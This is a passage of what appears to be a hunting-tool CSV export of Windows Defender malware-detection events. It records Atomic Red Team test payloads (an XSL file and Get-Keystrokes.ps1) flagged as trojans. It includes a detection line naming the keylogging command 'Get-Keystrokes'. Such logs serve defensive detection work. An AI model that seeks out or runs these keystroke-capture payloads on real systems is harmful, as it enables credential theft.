<Data Name=""Threat Name"">Trojan:XML/Exeselrun.gen!A</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:XML/Exeselrun.gen!A&amp;threatid=2147735426&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">2</Data>
<Data Name=""Type Name"">%%823</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:40:00.730676Z"">
</TimeCreated>
<EventRecordID>37</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:40:00.730676Z"">
</TimeCreated>
<EventRecordID>37</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational